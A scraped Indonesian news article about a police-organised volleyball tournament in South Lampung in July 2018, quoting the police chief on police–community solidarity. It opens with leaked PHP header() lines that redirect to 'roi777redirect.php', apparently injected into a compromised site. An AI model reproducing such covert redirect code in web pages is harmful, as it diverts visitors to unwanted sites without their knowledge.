header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pesan Kapolres Lamsel, Juara Bukan Segelanya.Tapi rasa Kekeluragaan Yang Utama Antara Polri dan Masyarakat. -
Pesan Kapolres Lamsel, Juara Bukan Segelanya.Tapi rasa Kekeluragaan Yang Utama Antara Polri dan Masyarakat.

TRANSLAMPUNG.COM,KALIANDA – 13 Tim Putra dan 14 Tim Putri bersaing untuk memprebutkan, Juara 1 Lomba Bola Volly Hut bhayangkara ke 72 Polres Lamsel, yang berlangsung di Lapangan Kompleks Perkantoran Bupati.

“Kegiatan perlombaan Bola Volly yang dilaksanakan polres lamsel ini, untuk menjali rasa persaudaran Polri dan masyarakat yang mengikuti perlombaan,” kata Kapolres Lamsel, AKBP.M.Syarhan saat ditemui dilapangan usai melakukan servis bola Bola Volly pertama, Kamis (5/7/2018).

 

Menang atau kalah dalam perlombaan ini, ditambahkan dia, bukanlah suatu tujuan. Namun yang terpenting menjalin silahturami, solidaritas senergritas masyarakat dan Polri.

“Jangan dilihat menang atau kalah. Tapi rasa kebersamaan dan junjung sportifitas. Mudahan-mudahan kegiatan yang diselenggarakan ini, menjadi rasa persaudaraan antara masyarakat dan Polri. Kami ada, karena ada dukungan dari masyarakat,” kata dia.(JOHAN)

News Reporter